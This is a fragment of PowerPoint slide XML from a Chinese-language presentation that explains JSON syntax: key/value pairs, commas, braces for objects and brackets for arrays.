                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>格式。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166169020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593429"/>
            <a:ext cx="6871113" cy="1251544"/>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en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>形式与语法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="4407258"/>
            <a:ext cx="5891356" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>语法规则：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据在名称</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值对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据由逗号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>分隔</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>大括号保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中括号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>保存数组</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4F4F4F"/>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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8246653" y="4669439"/>
            <a:ext cx="12842640" cy="4077469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241790310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593429"/>
            <a:ext cx="6871113" cy="1251544"/>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en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>形式与语法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="3279071"/>
            <a:ext cx="22861705" cy="152397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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>结构以”</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大括号开始，以”</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大括号结束。中间部分由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>或多个以”，”分隔的”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>key(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>关键字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>)/value(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>值</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对构成，关键字和值之间以”：”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>分隔。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1312453" y="5468271"/>
            <a:ext cx="7526793" cy="4177173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6365534" y="10367778"/>
            <a:ext cx="12192000" cy="1508105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>其中关键字是字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以是字符串，数值，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>true,false,null</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对象或数组</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2290725"/>
            <a:ext cx="9841156" cy="800219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>有两种表示结构，对象和数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9812593" y="5494071"/>
            <a:ext cx="12192000" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在花括号中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的形式出现（其中键多以字符串形式出现，值可取字符串，数值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，以及其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>每</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>键：值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对以逗号分隔（最后一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>键：值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对省略逗号）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65816464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593429"/>
            <a:ext cx="6871113" cy="1251544"/>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en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
